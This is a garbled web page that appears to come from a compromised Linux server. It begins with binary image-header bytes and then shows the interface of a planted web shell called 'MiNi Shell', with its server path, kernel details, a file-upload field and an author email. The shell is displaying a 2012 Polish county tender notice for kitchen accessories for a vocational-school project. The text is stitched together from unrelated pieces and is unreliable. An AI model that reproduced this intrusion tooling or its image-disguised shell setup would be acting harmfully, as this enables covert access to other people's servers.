JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/202481-N-2012.html

<p class="kh_header"><b>Żnin: Przedmiotem zamówienia jest dostawa akcesoriów kuchennych na potrzeby projektu  Autostrada kompetencji i umiejętności realizowanego w ramach priorytetu IX. Rozwój wykształcenia i kompetencji w regionach Programu Operacyjnego Kapitał Ludzki, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</b><br>
<b>Numer ogłoszenia: 202481 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Żninie , ul. Potockiego 1, 88-400 Żnin, woj. kujawsko-pomorskie, tel. 052 3031100, faks 052 3031302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.znin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa akcesoriów kuchennych na potrzeby projektu  Autostrada kompetencji i umiejętności realizowanego w ramach priorytetu IX. Rozwój wykształcenia i kompetencji w regionach Programu Operacyjnego Kapitał Ludzki, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. dzbanek do napojów        szkło bezbarwne,                   1 l	6
2. cedzak (durszlak) emaliowany, z rączkami, na nóżce, głęboki, średnica min. 20 cm, pojemność min. 1,8l	6
3.chochla (nabierka wazowa) pojemność min. 360 ml, stal nierdzewna	6
4. filiżanka ze spodkiem, pojemność 0,25 ml, porcelana, gładka lub z delikatnym deseniem, wszystkie jednakowe, spodek od kompletu z filiżanką, z możliwością używania w zmywarce i kuchence mikrofalowej	24
5. garnek niski ze stali nierdzewnej z pokrywą żaroodporną i uchwytami, minimalne wymiary: średnica: 16 cm, wysokość: 10,5 cm, pojemność: 2,0l	6
6. garnek średni ze stali nierdzewnej, z pokrywą  żaroodporną i uchwytami, minimalne wymiary: średnica: 20 cm, wysokość: 12,5 cm, pojemność: 3,5 l	6
7. garnek wysoki	ze stali nierdzewnej, z pokrywą  żaroodporną i uchwytami,  minimalne wymiary: średnica: 24 cm, wysokość: 14,5 cm, pojemność: 6,5 l	6
8. komplet desek: 
1)1 szt - Deska kauczukowa o wymiarach min. długość: 40 cm, szerokość: 26 cm, grubość:              2 cm
2)1 szt - Deska kauczukowa o wymiarach min. długość: 30 cm, szerokość: 20 cm, grubość:                1 cm
3) 1 szt- deska drewniana z kloszem ze szkła   o  wymiarach min. wysokość: 17,5 cm, średnica:  22 cm	6
9. komplet misek 	w komplecie min. 4 szt. ze stali nierdzewnej o wymiarach minimalnych:
- miska 1.5 L
- miska 2 L
- miska 3 L
- miska 4 L	6
10. komplet sztućców, wysoki połysk, stal nierdzewna, opakowanie zbiorcze,
w komplecie co najmniej :
nóż obiadowy - 6 szt.; 
widelec obiadowy - 6 szt. 
łyżka obiadowa - 6 szt.
łyżeczka do herbaty - 6 szt.	4
11. komplet naczyń żaroodpornych z pokrywkami. Można używać w temperaturze 240°C, przeznaczone do pieczenia w każdym piekarniku. W komplecie:
1) kształt prostokątny, pojemność całkowita min. 5l - 1 szt
2) kształt prostokątny, pojemność całkowita min. 3l - 1 szt
3) kształt prostokątny, pojemność całkowita min. 1,5l - 1 szt
4) kształt okrągły, pojemność całkowita min. 5,5l -       1 szt
5) kształt okrągły, pojemność całkowita min. 3l -          1 szt
kształt okrągły, pojemność całkowita min. 1,5l -      1 szt	6
12. nóż do mięsa,	gładki, ze stali nierdzewnej, długość ostrza min. 15 cm	6
13. nóż do obierana  jarzyn i owoców,	ze stali nierdzewnej, długość ostrza 
min. 9 cm         6
14. nóż do pieczywa, ze stali nierdzewnej, długość ostrza min. 15 cm	6
15. nóż uniwersalny kuchenny ze stali nierdzewnej, długość ostrza min. 25 cm
6
16. opakowania jednorazowe do cateringu
1) styropianowy pojemnik obiadowy trójdzielny - 300 szt
2) miska plastikowa do zup, biała 500 ml - 300 szt
3) talerz jednorazowy trójdzielny śr. ok. 205mm z białego tworzywa, przeznaczony do serwowania posiłków - 300 szt
4) Kubek jednorazowy przeznaczony do napojów zimnych i gorących, sztywny- 
300 szt
5)Talerz jednorazowy deserowy śr. ok. 170mm, z białego tworzywa, przeznaczony do serwowania posiłków - 300 szt
Tacka prostokątna tekturowa biała rozmiar ok.18x24cm - 300 szt	300
17. patelnia teflonowa	min. śr. 24cm, wys. min. 4 cm
- Patelnia aluminiowa lub ze stali nierdzewnej
-Od wewnątrz 2 warstwowa powłoka teflonowa 
- Rączka profilowana, nie nagrzewająca się
- Grube dno	6
18. patelnia teflonowa	z pokrywą min. śr. 28cm, wys. min. 5 cm
- Patelnia aluminiowa lub ze stali nierdzewnej 
- Od wewnątrz 2 warstwowa powłoka teflonowa 
- Rączka profilowana, nie nagrzewająca się
- Grube dno	6
19. patera do ciast
- 3 poziomy okrągłe o średnicy min. 30cm, 25 cm i 20 cm, wysokość min. 35 cm
szklana lub ze stali nierdzewnej	6
20. podgrzewacz stołowy (brytfanna podwójna na podgrzewaczu)
- Pojemność: 2 szt naczyń x min. 1,5 l
- Naczynia żaroodporne z pokrywami
- Stelaż z metalu chromowanego z miejscem na świeczki	6
21. rondel z trzonkiem powłoka teflonowa wewnątrz, wymiary minimalne: pojemność: 1 litr, średnica: 16 cm, wysokość: 7 cm	2
22.; rondel z trzonkiem powłoka teflonowa wewnątrz, wymiary minimalne: pojemność: 1,5 litr, średnica: 18 cm, wysokość: 8 cm	2
23. rondel z trzonkiem powłoka teflonowa wewnątrz, wymiary minimalne: pojemność: 2,0 litr, średnica: 20 cm, wysokość: 9 cm	2
24. stolnica drewniana z brzegami z trzech stron, wymiary minimalne 70x50 cm6
25.; taca duża drewno kauczukowe, uchwyty, podwyższone brzegi
wymiary minimalne: długość 50 cm, szerokość 40 cm, wysokość 5 cm	6
26. taca średnia drewno kauczukowe, uchwyty, podwyższone brzegi
wymiary minimalne: długość 40 cm, szerokość 35 cm, wysokość 5 cm	6
27. tacka na rachunek z klipsem wykonana ze stali nierdzewnej
wymiary minimalne: 150mm x 110mm	6
28. komplet obiadowy porcelanowy	 złożony z co najmniej
- 6 sztuk - talerz obiadowy - śr. min. 25 cm 
- 6 sztuk - talerz głęboki do zupy - śr. min. 20 cm
- 6 sztuk - talerz deserowy - śr. min. 18 cm
Do mycia w zmywarce	4
29. termos konferencyjny, wymiary minimalne: pojemność - 2 l, Materiał wykonania: stal nierdzewna, do gorących i zimnych napojów, odkręcana pokrywa10

30. wyciskarka do owoców cytrusowych ręczna ze stali nierdzewnej 	4
Podane parametry są parametrami minimalnymi. Zaproponowane lepsze rozwiązania technologiczne będą traktowane jako spełniające wymagania przedmiotu zamówienia.
3. Wszystkie dostarczone przedmioty zamówienia będą fabrycznie nowe. Wykonawca zobowiązany jest dostarczyć przedmiot zamówienia w oryginalnym opakowaniu. 
4. O gotowości dostarczenia przedmiotu zamówienia Wykonawca zobowiązany jest zawiadomić Zamawiającego w formie pisemnej, e-mailem, faxem  lub telefonicznie z co najmniej dwudniowym wyprzedzeniem. 
5. Wykonawca dostarczy przedmiot zamówienia własnym transportem i na własne ryzyko do miejsca wskazanego przez Zamawiającego. 
6. Wykonawca zobowiązany będzie do dostarczenia, rozładowania, wniesienia, przedmiotu zamówienia we wskazanym przez Zamawiającego miejscu.
7. Wykonawca odpowiada za przedmiot zamówienia do czasu jego ostatecznego przekazania i podpisania protokołu odbioru przedmiotu zamówienia.
8. Protokół odbioru przedmiotu zamówienia podpisany przez przedstawiciela Wykonawcy i Zamawiającego stwierdza kompletność, poprawność i zgodność dostawy przedmiotu zamówienia.
9. Podpisanie protokołu odbioru, o którym mowa w pkt. 8 i odbiór sprzętu w ramach dostawy nie pozbawia Zamawiającego prawa do zgłoszenia reklamacji z tytułu jego jakości. Zamawiający ma prawo do składania reklamacji dotyczących jakości dostarczonego przedmiotu zamówienia za pomocą pism, faksu lub poczty elektronicznej, które to formy są wiążące dla Wykonawcy. 
10. W przypadku otrzymania przedmiotu zamówienia złej jakości oraz w razie ujawnienia wad po odbiorze, Wykonawca na swój koszt dokona jego wymiany na nowy lub dokona usunięcia wad w terminie  do 7 dnia roboczego od chwili zgłoszenia. Wówczas za datę odbioru ustala się datę odbioru przedmiotu zamówienia bez wad. 
11. Szczegółowe warunki realizacji zamówienia zawarte są w projekcie umowy stanowiącym załącznik nr 4 do SIWZ.
12. Wykonawca jest zobowiązany do wskazania w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcy ( art. 36 ust. 4 ustawy Pzp)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.20.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawców wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zobowiązanie - załącznik nr 2A do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy określa załączony do specyfikacji istotnych warunków zamówienia  wzór umowy stanowiący jej integralną część -  załącznik nr 4 do  SIWZ.
2. Wykonawca nie może dokonywać żadnych zmian w projekcie umowy i zobowiązuje się do jej podpisania, gdy zostanie wybrany na Wykonawcę niniejszego zamówienia.
3. Zmiana  umowy musi być zgodna z art. 144  ustawy Prawo zamówień publicznych oraz wymaga formy pisemnej pod rygorem nieważności.
4. Zamawiający może odstąpić od umowy ze skutkiem natychmiastowym, jeżeli Wykonawca rażąco naruszy postanowienia umowy, niezależnie od zaistnienia przesłanek z art. 144 Prawa zamówień publicznych. 
5. Zamawiający nie przewiduje zawarcia umowy ramowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.znin.pl - w katalogu ZAMÓWIENIA PUBLICZNE<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żninie
ul. Potockiego 1
88-400 Żnin
pokój nr 12 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 09:00, miejsce: w siedzibie Zamawiającego Starostwo Powiatowe w Żninie ul. Potockiego 1 Sekretariat Starosty Żnińskiego - pokój nr 19 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany  ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego,  WND-POKL.09.02.00-04-003)11..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com